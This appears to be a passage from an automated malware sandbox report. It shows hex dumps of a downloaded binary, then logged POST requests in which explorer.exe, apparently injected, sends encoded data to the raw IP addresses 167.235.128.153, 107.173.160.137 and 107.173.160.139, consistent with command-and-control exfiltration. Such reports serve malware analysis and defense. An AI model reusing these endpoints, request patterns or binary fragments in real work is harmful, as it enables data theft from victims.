                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: 24 60 0f b7 7e 52 48 0f af cf 48 c1 e8 38 48 03 4b 10 3c 05 73 03 83 c0 05 48 89 4c 24 40 88 44 24 1f 48 89 ca eb 43 8b 50 54 0f ba e2 04 72 06 31 c0 31 db eb 0f 48 8b 40 30 48 89 cb 0f 1f 00 e8 9b 46 ff ff 48 85 c0 75 06 48 83 c4 50 5d c3 74 04 48 8b 40 08 e8 65 87 02 00 0f b7 7e 52 48 8d 3c 0f 48 8d 7f f8 48 8b 0f 48 85 c9 74 09 48 89 4c 24 48 31 ff eb 36 0f b6 4b 08 0f 1f 40 00 f6 c1 04 75 16 48 8d 05 25 fa 65 00 bb 15 00 00 00 e8 ca 93 02 00 48 8b 5c 24 68 0f b6 43 08 83 e0 fb 88 43 08 48 83 c4 50 5d c3 48 ff c7 48 83 ff 08 73 a7 44 0f b6 04 0f 44 38 c0 74 09 66 90 45 84 c0 75 e6 eb b1 48 89 7c 24 20 44 0f b6 46 50 4c 0f af c7 49 8d 0c 08 48 8d 49 08 44 8b 46 54 48 89 4c 24 38 41 0f ba e0 00 73 05 4c 8b 01 eb 03 49 89 c8 48 8b 4e 30 48 8b 51 18 48 8b
                                                                                    Data Ascii: $`~RHH8HK<sHL$@D$HCPTr11H@0HFHuHP]tH@e~RH<HHHtHL$H16K@uH%eH\$hCCHP]HHsDD8tfEuH|$ DFPLIHIDFTHL$8AsLIHN0HQH
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: 24 68 48 8b 11 48 8d 72 ff 48 89 31 48 83 fa 01 75 0d e8 29 35 05 00 48 8b 4c 24 68 89 41 0c 48 89 cb e9 8d fe ff ff 48 83 fa 08 73 65 41 84 01 41 c6 04 11 00 48 85 d2 75 0a 4d 39 d1 74 be 4c 89 d0 eb 29 48 ff ca 48 83 fa 08 73 10 41 84 01 42 0f b6 34 0a 40 80 fe 01 74 cc eb a0 48 89 d0 b9 08 00 00 00 e8 d6 8a 05 00 49 89 d2 0f b7 57 52 4c 89 d6 4a 8d 14 12 48 8d 52 f8 48 8b 12 90 49 39 d1 75 e5 49 89 c2 ba 07 00 00 00 49 89 f1 eb b5 48 89 d0 b9 08 00 00 00 e8 a1 8a 05 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 e8 67 67 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 ce fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5f 55 48 89 e5 48 83 ec 18 0f b6 53 08 0f b6 73 09 f6 c2 08 75 02 ff ce 48 89
                                                                                    Data Ascii: $hHHrH1Hu)5HL$hAHHseAAHuM9tL)HHsAB4@tHIWRLJHRHI9uIIHHD$H\$HL$H|$ ggHD$H\$HL$H|$ I;fv_UHHSsuH
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: 00 f2 0f 10 05 47 55 70 00 f2 0f 11 02 b8 01 00 00 00 eb 2c 48 81 c4 08 02 00 00 5d c3 4c 8b 0d 7c 61 ac 00 41 ff c0 45 0f b7 c0 0f 57 c0 f2 41 0f 2a c0 f2 41 0f 11 04 c1 48 ff c0 0f 1f 40 00 48 83 f8 44 7d 1f 48 8b 0d 5b 61 ac 00 48 8d 15 6c 3d 48 00 44 0f b7 04 42 48 39 c8 72 bf 66 90 e9 4d 17 00 00 48 8b 0d 44 61 ac 00 48 8b 1d 35 61 ac 00 48 ff c3 48 8b 05 23 61 ac 00 0f 1f 00 48 39 d9 73 3b bf 01 00 00 00 48 8d 35 2f 0e 57 00 e8 6a 75 03 00 48 89 0d 13 61 ac 00 83 3d 6c 0e b5 00 00 74 13 e8 d5 46 05 00 49 89 03 48 8b 0d eb 60 ac 00 49 89 4b 08 48 89 05 e0 60 ac 00 48 89 1d e1 60 ac 00 f2 0f 10 05 d1 55 70 00 f2 0f 11 44 d8 f8 e8 66 25 ff ff 48 89 1d e7 60 ac 00 48 89 0d e8 60 ac 00 83 3d 21 0e b5 00 00 74 13 e8 8a 46 05 00 49 89 03 48 8b 15 c0 60 ac
                                                                                    Data Ascii: GUp,H]L|aAEWA*AH@HD}H[aHl=HDBH9rfMHDaH5aHH#aH9s;H5/WjuHa=ltFIH`IKH`H`UpDf%H`H`=!tFIH`
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: 29 d1 ff c1 d1 e1 48 8d 15 77 c9 b4 00 f0 0f b1 0a 0f 94 c1 84 c9 74 c7 90 8b 05 15 37 ac 00 89 c1 81 e1 00 00 00 80 85 c9 75 21 8d 50 01 48 8d 35 ff 36 ac 00 f0 0f b1 16 0f 94 c2 0f 1f 40 00 84 d2 74 d4 8b 15 36 e9 ad 00 eb 06 8b 15 2e e9 ad 00 89 8c 24 a4 00 00 00 89 94 24 a0 00 00 00 0f b6 74 24 26 40 84 f6 74 04 85 c9 eb 14 85 c9 0f 85 f3 08 00 00 40 84 f6 74 0d 0f 1f 44 00 00 85 c9 0f 84 d0 08 00 00 44 0f 11 bc 24 78 01 00 00 c6 84 24 88 01 00 00 00 48 c7 84 24 90 01 00 00 00 00 00 00 48 8d 05 94 09 00 00 48 89 84 24 78 01 00 00 48 8b 84 24 a8 00 00 00 48 89 84 24 80 01 00 00 0f b6 44 24 3f 88 84 24 88 01 00 00 48 8b 84 24 30 01 00 00 48 89 84 24 90 01 00 00 48 8d 84 24 78 01 00 00 48 89 04 24 e8 0f e6 04 00 45 0f 57 ff 4c 8b 35 f4 cb b4 00 65 4d 8b
                                                                                    Data Ascii: )Hwt7u!PH56@t6.$$t$&@t@tDD$x$H$HH$xH$H$D$?$H$0H$H$xH$EWL5eM
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: df 48 8d b4 24 a0 00 00 00 bb 08 00 00 00 48 89 d0 e8 ca 0e 00 00 48 8b 84 24 30 01 00 00 48 8d 7c 24 40 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f5 cd 04 00 48 8b 6d 00 48 c7 c3 ff ff ff ff 48 89 d9 48 89 cf 48 89 c6 45 31 c0 48 8d 44 24 40 e8 49 d2 03 00 e9 d5 00 00 00 0f 1f 40 00 83 fa 06 75 0b 31 c0 48 81 c4 20 01 00 00 5d c3 90 8b 88 90 00 00 00 89 c9 48 89 8c 24 08 01 00 00 48 8b 90 98 00 00 00 48 89 94 24 00 01 00 00 e8 8b ad 01 00 48 8d 05 23 8b 64 00 bb 0c 00 00 00 e8 fa b5 01 00 48 8b 84 24 30 01 00 00 e8 6d b5 01 00 48 8d 05 ce 55 64 00 bb 07 00 00 00 90 e8 db b5 01 00 48 8b 84 24 00 01 00 00 e8 0e b3 01 00 48 8d 05 62 df 64 00 bb 13 00 00 00 66 90 e8 bb b5 01 00 48 8b 84 24 08 01 00 00 e8 ee b2 01 00 e8 69 af 01 00 e8 84 ad 01 00 48 8d 05
                                                                                    Data Ascii: H$HH$0H|$@HHl$Hl$HmHHHHE1HD$@I@u1H ]H$HH$H#dH$0mHUdH$HbdfH$iH
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 84 01 00 00 55 48 89 e5 48 83 ec 20 48 89 44 24 30 84 00 90 e8 21 82 fe ff 4c 89 f1 48 8b 44 24 30 48 39 48 08 0f 85 4b 01 00 00 90 e8 69 84 fe ff 0f 57 c0 31 c0 eb 06 0f 10 c1 48 89 c8 f2 0f 10 0d 2c 96 6f 00 66 0f 2e c8 0f 86 f0 00 00 00 f2 0f 11 44 24 18 48 89 44 24 10 48 8b 44 24 30 48 8b 90 90 00 00 00 48 8b 0a ff d1 84 c0 0f 85 bf 00 00 00 48 8b 4c 24 30 48 8b 91 88 00 00 00 48 8b 1a b8 00 00 01 00 ff d3 48 85 db 75 5e 48 8b 0d c4 49 b4 00 0f 1f 40 00 48 85 c9 0f 84 ce 00 00 00 48 89 c2 48 89 d3 31 d2 48 f7 f1 48 85 c0 7c 0a 0f 57 c9 f2 48 0f 2a c8 eb 18 48 89 c1 83 e0 01 48 d1 e9 48 09 c1 0f 57 c9 f2 48 0f 2a c9 f2 0f 58 c9 f2 0f 10 15
                                                                                    Data Ascii: I;fUHH HD$0!LHD$0H9HKiW1H,of.D$HD$HD$0HHHL$0HHHu^HI@HHH1HH|WH*HHHWH*X


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.1049738167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:36 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 7627
                                                                                    2024-07-24 17:56:36 UTC7627OUTData Raw: 54 34 48 70 79 59 73 6c 54 4a 43 48 44 56 49 39 55 6e 74 51 66 45 56 34 59 56 38 79 6d 6b 2b 49 49 79 66 4a 53 6a 6d 79 49 71 35 33 2b 67 77 53 62 79 6a 4b 4f 64 73 4e 79 45 69 74 45 52 31 58 32 32 66 61 44 6c 70 78 54 6d 36 57 35 71 4b 33 69 76 49 43 35 67 54 67 2b 53 36 66 4c 33 4b 59 37 7a 66 6e 7a 78 50 78 66 45 65 6f 41 69 76 6c 74 53 68 66 54 54 38 42 63 36 2f 4a 65 72 79 48 47 51 39 41 56 79 7a 42 4b 31 48 4e 2b 48 41 57 78 48 6b 49 70 68 7a 35 54 39 56 70 56 4e 6d 32 33 33 66 6c 5a 74 63 50 78 79 31 69 34 41 51 68 6f 51 42 4e 73 73 44 44 56 6d 75 56 32 6a 33 76 71 2b 51 55 39 4f 48 53 77 4c 45 76 48 63 50 54 68 45 35 38 74 77 37 72 4e 50 74 37 42 50 58 6e 61 44 4a 4a 52 76 6f 38 66 2b 4a 54 44 31 62 33 61 76 47 6c 78 30 6b 75 4c 6c 52 64 31 36 42
                                                                                    Data Ascii: T4HpyYslTJCHDVI9UntQfEV4YV8ymk+IIyfJSjmyIq53+gwSbyjKOdsNyEitER1X22faDlpxTm6W5qK3ivIC5gTg+S6fL3KY7zfnzxPxfEeoAivltShfTT8Bc6/JeryHGQ9AVyzBK1HN+HAWxHkIphz5T9VpVNm233flZtcPxy1i4AQhoQBNssDDVmuV2j3vq+QU9OHSwLEvHcPThE58tw7rNPt7BPXnaDJJRvo8f+JTD1b3avGlx0kuLlRd16B
                                                                                    2024-07-24 17:56:37 UTC94INHTTP/1.1 200 OK
                                                                                    Content-Length: 0
                                                                                    Date: Wed, 24 Jul 2024 17:56:37 GMT
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.1049739107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:38 UTC236OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 139784
                                                                                    2024-07-24 17:56:38 UTC16148OUTData Raw: 54 68 51 38 7a 2b 4d 4f 5a 57 41 4e 75 46 67 45 55 58 78 49 52 70 34 65 4c 67 53 6e 2f 38 64 6e 6c 2f 4e 5a 2b 78 58 33 76 44 55 64 6a 73 5a 6f 7a 72 58 77 2f 64 38 44 44 4f 2f 4c 75 56 51 63 6c 30 63 36 58 6b 6d 62 39 67 5a 6a 79 55 47 2b 48 6e 55 41 6a 2f 69 61 32 4c 5a 4c 69 69 2f 58 4c 39 6f 67 45 61 4b 41 30 41 69 72 62 59 49 73 54 77 71 49 39 32 7a 68 76 56 4b 5a 65 5a 30 5a 4e 31 70 37 4d 61 66 4f 32 37 31 54 57 6d 4d 79 43 77 62 78 2f 55 48 4d 32 57 31 58 72 6a 47 6e 52 31 59 31 46 47 52 38 43 33 4d 54 74 57 66 44 41 34 4a 41 64 66 6b 55 59 72 6a 33 58 53 54 49 38 58 31 42 77 61 62 54 37 61 55 56 6e 63 54 34 39 41 31 48 67 4a 72 59 53 69 31 4f 4c 4e 79 73 4c 54 59 66 69 65 63 41 59 50 52 41 69 71 4c 71 71 57 4a 7a 31 41 38 51 37 5a 6b 76 66 65 46
                                                                                    Data Ascii: ThQ8z+MOZWANuFgEUXxIRp4eLgSn/8dnl/NZ+xX3vDUdjsZozrXw/d8DDO/LuVQcl0c6Xkmb9gZjyUG+HnUAj/ia2LZLii/XL9ogEaKA0AirbYIsTwqI92zhvVKZeZ0ZN1p7MafO271TWmMyCwbx/UHM2W1XrjGnR1Y1FGR8C3MTtWfDA4JAdfkUYrj3XSTI8X1BwabT7aUVncT49A1HgJrYSi1OLNysLTYfiecAYPRAiqLqqWJz1A8Q7ZkvfeF
                                                                                    2024-07-24 17:56:38 UTC16384OUTData Raw: 55 68 6c 70 37 74 45 39 78 6f 61 39 73 6b 4a 2f 31 6c 55 61 6c 66 39 70 41 39 4d 58 2f 76 72 79 6c 35 42 78 79 31 67 59 42 72 63 4f 62 76 69 4a 61 42 45 4b 4b 50 79 4a 77 73 77 37 4e 42 58 4d 53 68 38 48 77 68 64 2b 48 61 4e 41 66 47 43 6b 79 2f 53 57 78 43 6b 30 63 37 44 70 4c 37 34 31 2f 42 35 78 34 69 68 53 4f 44 47 37 79 4a 59 6d 72 50 37 32 53 59 33 59 71 78 2f 5a 75 61 6a 45 38 73 34 42 44 62 4f 46 51 73 4b 47 6a 75 37 36 44 6d 31 37 77 43 53 47 52 6f 48 56 6a 4f 77 32 35 57 52 37 46 44 77 31 43 4d 30 6e 5a 67 58 63 69 72 49 6d 79 67 64 64 54 6a 64 39 31 31 45 6a 38 54 31 74 61 61 77 78 50 4f 62 6c 4e 48 43 63 37 67 33 41 4b 78 2f 5a 36 44 64 63 4d 38 6e 58 48 76 35 48 71 46 49 37 57 4f 6b 78 38 77 75 5a 31 2b 76 31 53 52 73 32 61 51 6d 75 53 51 50
                                                                                    Data Ascii: Uhlp7tE9xoa9skJ/1lUalf9pA9MX/vryl5Bxy1gYBrcObviJaBEKKPyJwsw7NBXMSh8Hwhd+HaNAfGCky/SWxCk0c7DpL741/B5x4ihSODG7yJYmrP72SY3Yqx/ZuajE8s4BDbOFQsKGju76Dm17wCSGRoHVjOw25WR7FDw1CM0nZgXcirImygddTjd911Ej8T1taawxPOblNHCc7g3AKx/Z6DdcM8nXHv5HqFI7WOkx8wuZ1+v1SRs2aQmuSQP
                                                                                    2024-07-24 17:56:38 UTC16384OUTData Raw: 53 6f 42 42 75 55 37 6b 56 78 44 6d 47 30 41 6d 5a 58 72 54 34 30 4c 48 6f 63 2b 6f 6f 39 39 68 4d 62 74 44 2b 6b 73 48 63 33 70 51 39 76 30 4e 71 76 31 63 37 4c 73 65 59 70 65 32 59 51 39 44 6f 2f 33 36 44 70 68 34 32 5a 34 71 6a 72 53 4a 47 5a 51 59 77 4a 46 47 65 70 5a 41 42 6d 42 65 78 33 72 4d 63 33 46 52 4c 72 6b 73 53 73 6a 31 45 2b 68 59 46 6c 34 4b 37 52 62 48 70 67 52 58 72 4f 68 75 59 4b 4a 64 6f 45 79 43 31 50 59 4f 46 5a 61 6f 4b 47 4a 79 6d 49 71 52 33 42 6f 74 63 55 53 4f 71 47 4a 62 41 63 65 52 57 6f 49 64 63 36 67 6b 37 41 33 49 48 4c 50 45 33 63 55 30 4c 46 70 52 6a 39 43 53 30 66 38 49 77 68 63 76 5a 72 38 70 31 30 42 49 6e 62 39 73 78 51 7a 6a 6b 35 7a 46 45 6e 32 73 61 31 33 58 6c 57 64 55 70 35 4a 44 72 7a 79 41 6a 48 4d 39 58 73 65
                                                                                    Data Ascii: SoBBuU7kVxDmG0AmZXrT40LHoc+oo99hMbtD+ksHc3pQ9v0Nqv1c7LseYpe2YQ9Do/36Dph42Z4qjrSJGZQYwJFGepZABmBex3rMc3FRLrksSsj1E+hYFl4K7RbHpgRXrOhuYKJdoEyC1PYOFZaoKGJymIqR3BotcUSOqGJbAceRWoIdc6gk7A3IHLPE3cU0LFpRj9CS0f8IwhcvZr8p10BInb9sxQzjk5zFEn2sa13XlWdUp5JDrzyAjHM9Xse
                                                                                    2024-07-24 17:56:38 UTC16384OUTData Raw: 53 52 66 6f 36 4a 53 72 7a 38 2b 32 78 32 6d 75 63 39 64 4a 2f 58 63 62 63 66 31 76 74 32 35 73 73 44 36 71 4e 63 31 48 75 45 34 44 55 5a 71 50 55 34 64 5a 56 39 7a 79 47 35 7a 4f 4e 31 36 55 76 31 4b 50 58 5a 51 65 52 53 2b 48 6f 43 36 4c 7a 46 69 4d 78 41 78 69 55 73 35 39 63 68 50 48 63 72 43 66 5a 65 54 30 62 66 41 36 31 49 73 39 72 76 48 34 65 54 33 74 64 4b 44 53 70 73 36 5a 48 38 77 72 61 75 6d 4c 4a 36 49 47 46 33 55 32 6b 51 31 70 46 39 74 6d 43 64 6f 33 6b 63 30 74 4b 43 4a 79 6f 67 44 48 58 75 75 6d 43 5a 61 64 46 5a 64 5a 76 6b 66 32 61 4e 64 4e 6a 36 4d 4d 70 69 7a 34 5a 70 69 38 48 39 48 54 2b 6a 69 43 6e 78 47 71 7a 2f 6d 44 42 2b 6d 44 44 73 65 39 42 34 6f 70 62 6f 51 50 63 4e 77 43 63 6d 35 68 72 35 71 78 32 69 33 79 48 71 34 31 4f 69 77
                                                                                    Data Ascii: SRfo6JSrz8+2x2muc9dJ/Xcbcf1vt25ssD6qNc1HuE4DUZqPU4dZV9zyG5zON16Uv1KPXZQeRS+HoC6LzFiMxAxiUs59chPHcrCfZeT0bfA61Is9rvH4eT3tdKDSps6ZH8wraumLJ6IGF3U2kQ1pF9tmCdo3kc0tKCJyogDHXuumCZadFZdZvkf2aNdNj6MMpiz4Zpi8H9HT+jiCnxGqz/mDB+mDDse9B4opboQPcNwCcm5hr5qx2i3yHq41Oiw
                                                                                    2024-07-24 17:56:38 UTC16384OUTData Raw: 42 56 6d 64 6a 69 78 75 2f 54 33 4b 46 57 39 32 6a 61 54 79 4b 6a 4d 30 63 67 50 38 7a 61 30 33 6e 75 32 33 49 6d 42 6e 6a 62 63 6d 6c 5a 2b 54 78 2f 77 48 37 38 41 6b 55 4e 59 4c 52 63 51 45 43 47 35 45 36 36 50 70 4e 72 68 38 77 73 39 33 50 53 57 71 42 61 47 46 5a 35 66 68 71 4d 74 63 69 65 46 67 57 42 53 4e 65 76 73 64 56 31 7a 2f 34 77 4d 4d 48 4c 42 65 57 7a 73 67 4c 41 74 36 4a 68 4b 2f 41 4c 47 56 62 51 30 59 39 36 56 4a 43 59 53 34 55 75 69 6b 34 6f 58 78 70 4f 67 6c 2f 68 66 41 65 6e 41 41 45 67 50 6d 46 34 4f 56 36 38 37 63 59 66 64 50 77 52 48 73 71 44 4c 57 6d 56 42 64 56 77 68 50 32 65 45 64 6e 74 4c 44 44 51 2f 6a 57 68 59 6c 65 59 78 39 33 4c 6a 6e 6e 76 41 78 37 5a 49 77 67 78 5a 71 7a 71 77 2f 46 67 76 79 31 42 54 67 64 51 7a 51 75 4d 49
                                                                                    Data Ascii: BVmdjixu/T3KFW92jaTyKjM0cgP8za03nu23ImBnjbcmlZ+Tx/wH78AkUNYLRcQECG5E66PpNrh8ws93PSWqBaGFZ5fhqMtcieFgWBSNevsdV1z/4wMMHLBeWzsgLAt6JhK/ALGVbQ0Y96VJCYS4Uuik4oXxpOgl/hfAenAAEgPmF4OV687cYfdPwRHsqDLWmVBdVwhP2eEdntLDDQ/jWhYleYx93LjnnvAx7ZIwgxZqzqw/Fgvy1BTgdQzQuMI
                                                                                    2024-07-24 17:56:38 UTC16384OUTData Raw: 35 74 69 4c 56 6d 46 50 66 48 68 41 70 42 33 6b 34 72 38 56 69 32 64 64 62 39 32 68 44 45 48 66 31 4d 30 64 49 36 62 33 74 58 5a 7a 7a 4a 67 4e 2b 42 66 6a 61 35 6d 64 53 6a 4a 32 47 44 75 35 6b 6e 38 6b 75 33 70 78 67 46 51 63 42 2f 72 79 42 48 43 77 4a 67 79 32 41 42 39 64 74 69 4b 4c 4e 56 67 41 36 4c 49 4e 2b 48 4e 6a 43 43 44 68 2f 4c 38 4e 51 73 49 73 77 61 66 6f 73 6e 4a 4a 66 41 33 7a 53 69 76 42 79 50 66 46 6a 6b 55 58 59 32 56 78 59 72 4e 56 41 53 78 46 69 76 43 56 37 42 66 6b 4d 4b 48 4f 35 75 63 5a 38 7a 57 76 44 36 5a 32 62 6e 72 36 39 76 33 59 37 32 6d 71 71 63 45 4b 4f 64 4a 33 44 45 47 36 62 45 55 57 4a 38 51 6b 4d 53 32 62 47 33 70 36 4f 70 4c 4a 65 66 75 45 62 6f 48 4c 5a 49 70 5a 43 4a 4f 50 75 72 77 58 6a 77 73 47 43 48 52 56 49 55 49
                                                                                    Data Ascii: 5tiLVmFPfHhApB3k4r8Vi2ddb92hDEHf1M0dI6b3tXZzzJgN+Bfja5mdSjJ2GDu5kn8ku3pxgFQcB/ryBHCwJgy2AB9dtiKLNVgA6LIN+HNjCCDh/L8NQsIswafosnJJfA3zSivByPfFjkUXY2VxYrNVASxFivCV7BfkMKHO5ucZ8zWvD6Z2bnr69v3Y72mqqcEKOdJ3DEG6bEUWJ8QkMS2bG3p6OpLJefuEboHLZIpZCJOPurwXjwsGCHRVIUI
                                                                                    2024-07-24 17:56:38 UTC16384OUTData Raw: 74 4f 67 63 4c 7a 4d 77 54 2b 72 52 6c 2f 4a 56 31 2b 2f 35 61 65 68 46 30 4a 69 43 7a 57 53 5a 68 66 68 54 73 48 74 51 4d 49 30 4e 34 30 57 6e 74 38 6f 6b 4e 45 61 33 63 55 65 76 4a 79 77 62 67 6f 44 55 31 6d 7a 54 62 50 4f 4a 51 5a 52 52 45 68 49 36 73 46 6b 63 39 76 2b 46 64 65 68 34 44 45 68 59 32 75 35 51 77 5a 72 4a 66 76 76 77 33 38 41 79 32 4a 6a 46 38 34 56 71 63 34 51 49 4b 57 54 55 65 4d 67 4f 50 6b 66 33 6a 50 34 42 41 4f 71 77 39 50 77 47 6c 32 31 42 44 68 35 48 4e 58 64 5a 47 65 4f 6b 75 71 2f 78 68 77 4a 48 54 63 50 41 4c 51 72 45 5a 59 64 2f 51 53 6e 72 78 2b 48 49 2b 71 6c 6d 31 69 4e 5a 31 6a 44 50 6a 4f 57 73 74 4f 6c 32 36 39 4d 44 49 59 4c 7a 78 34 56 38 49 51 4f 33 6b 65 5a 2b 70 53 4b 6a 4b 72 74 56 6c 41 59 38 79 6e 65 65 30 75 42
                                                                                    Data Ascii: tOgcLzMwT+rRl/JV1+/5aehF0JiCzWSZhfhTsHtQMI0N40Wnt8okNEa3cUevJywbgoDU1mzTbPOJQZRREhI6sFkc9v+Fdeh4DEhY2u5QwZrJfvvw38Ay2JjF84Vqc4QIKWTUeMgOPkf3jP4BAOqw9PwGl21BDh5HNXdZGeOkuq/xhwJHTcPALQrEZYd/QSnrx+HI+qlm1iNZ1jDPjOWstOl269MDIYLzx4V8IQO3keZ+pSKjKrtVlAY8ynee0uB
                                                                                    2024-07-24 17:56:38 UTC16384OUTData Raw: 36 75 65 78 68 45 2b 58 58 46 75 64 43 63 64 6c 2b 31 58 7a 75 61 70 43 36 46 6d 4d 47 70 7a 45 71 68 37 49 52 4e 44 76 46 45 72 46 50 7a 4c 61 76 59 7a 4b 2f 69 52 34 77 5a 42 53 53 57 53 7a 72 71 31 50 2f 69 66 55 46 78 57 77 4b 56 51 74 68 68 41 65 66 63 61 72 57 75 76 56 42 41 6f 4d 4a 69 70 49 59 62 63 2b 5a 49 76 59 67 62 55 45 34 56 38 34 57 34 79 52 75 68 30 54 35 45 4f 52 44 4f 57 77 77 34 55 4c 58 6e 62 41 6f 6f 34 6d 30 4f 55 71 49 50 71 35 47 37 52 34 64 71 38 50 53 79 2f 7a 69 66 63 56 64 67 4b 6b 64 41 6f 76 61 53 35 4d 4e 56 74 57 4c 66 70 4d 34 42 6e 47 54 35 7a 6a 6d 76 70 6d 46 48 6e 45 71 6c 67 6c 42 72 42 74 36 63 2f 45 33 67 71 36 79 52 6f 6d 70 30 4d 6e 71 37 50 62 66 57 45 77 6e 63 61 6d 4a 6a 4b 72 30 4d 49 4d 46 57 31 74 5a 4c 57
                                                                                    Data Ascii: 6uexhE+XXFudCcdl+1XzuapC6FmMGpzEqh7IRNDvFErFPzLavYzK/iR4wZBSSWSzrq1P/ifUFxWwKVQthhAefcarWuvVBAoMJipIYbc+ZIvYgbUE4V84W4yRuh0T5EORDOWww4ULXnbAoo4m0OUqIPq5G7R4dq8PSy/zifcVdgKkdAovaS5MNVtWLfpM4BnGT5zjmvpmFHnEqlglBrBt6c/E3gq6yRomp0Mnq7PbfWEwncamJjKr0MIMFW1tZLW
                                                                                    2024-07-24 17:56:38 UTC8948OUTData Raw: 4f 65 57 65 34 61 6f 59 72 75 43 7a 65 33 5a 38 76 7a 6d 4f 74 51 7a 73 74 36 4b 4f 31 31 5a 63 32 32 52 38 73 4f 57 6d 54 69 76 43 52 50 63 53 6e 56 6d 74 56 5a 4e 54 79 54 56 4f 77 4c 4f 4f 6d 49 51 6d 52 30 72 5a 48 6e 73 6b 43 6d 70 78 6c 69 64 39 52 39 72 7a 4b 48 7a 68 75 52 64 5a 72 53 41 51 2b 79 4f 63 6a 63 78 47 39 43 53 38 59 4f 46 74 67 61 56 63 42 53 42 5a 6f 65 4c 45 6f 54 76 71 55 6d 48 76 6e 4c 79 6c 6b 77 66 65 6e 63 66 43 4a 53 74 71 38 76 70 76 4d 4e 44 5a 53 33 68 63 31 64 47 4c 4a 74 31 35 77 6d 66 70 45 64 7a 61 43 47 53 33 61 78 71 56 46 50 61 78 30 6c 48 58 2f 5a 50 41 62 76 75 46 51 53 44 4a 51 41 61 70 46 51 7a 56 35 46 69 59 50 41 75 69 46 43 70 45 74 30 46 38 4f 44 70 56 45 6e 6d 77 4c 50 64 32 51 6e 49 4b 61 54 68 51 65 6a 36
                                                                                    Data Ascii: OeWe4aoYruCze3Z8vzmOtQzst6KO11Zc22R8sOWmTivCRPcSnVmtVZNTyTVOwLOOmIQmR0rZHnskCmpxlid9R9rzKHzhuRdZrSAQ+yOcjcxG9CS8YOFtgaVcBSBZoeLEoTvqUmHvnLylkwfencfCJStq8vpvMNDZS3hc1dGLJt15wmfpEdzaCGS3axqVFPax0lHX/ZPAbvuFQSDJQAapFQzV5FiYPAuiFCpEt0F8ODpVEnmwLPd2QnIKaThQej6
                                                                                    2024-07-24 17:56:40 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 782
                                                                                    Date: Wed, 24 Jul 2024 17:56:40 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:40 UTC782INData Raw: 41 56 52 6d 45 46 6c 51 50 44 31 53 49 2f 55 6e 45 77 77 4c 32 46 7a 36 50 4c 2b 51 5a 52 71 2b 30 55 31 72 6e 6b 36 57 30 32 39 70 49 4e 72 63 50 61 65 61 4c 42 79 4f 6e 55 75 70 64 32 4f 51 73 63 2f 55 58 65 77 62 43 35 72 61 49 78 31 6f 50 38 74 54 33 73 75 47 73 70 32 46 43 44 4d 63 47 4d 6c 2f 54 65 6c 74 48 78 48 4e 55 4f 71 78 42 6a 30 4f 74 41 44 47 66 30 39 57 6a 2b 64 42 44 51 38 52 4c 2f 61 39 2b 36 30 65 2b 69 7a 4d 64 57 41 2b 54 4f 48 77 73 70 4d 6d 4f 59 61 44 4b 73 73 76 6c 78 55 57 4f 33 2f 43 35 51 4b 76 46 68 54 56 37 71 55 38 4b 69 50 70 45 67 48 7a 51 34 36 4b 45 4d 52 35 75 65 61 2b 70 34 69 43 4e 6f 62 66 6e 49 6b 56 53 56 38 32 65 77 53 72 6f 6e 75 45 6b 2b 31 7a 4f 7a 32 57 43 43 43 4c 4d 51 44 4c 6a 4d 33 6b 34 69 36 6d 59 6b 52
                                                                                    Data Ascii: AVRmEFlQPD1SI/UnEwwL2Fz6PL+QZRq+0U1rnk6W029pINrcPaeaLByOnUupd2OQsc/UXewbC5raIx1oP8tT3suGsp2FCDMcGMl/TeltHxHNUOqxBj0OtADGf09Wj+dBDQ8RL/a9+60e+izMdWA+TOHwspMmOYaDKssvlxUWO3/C5QKvFhTV7qU8KiPpEgHzQ46KEMR5uea+p4iCNobfnIkVSV82ewSronuEk+1zOz2WCCCLMQDLjM3k4i6mYkR


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.1049741107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:40 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
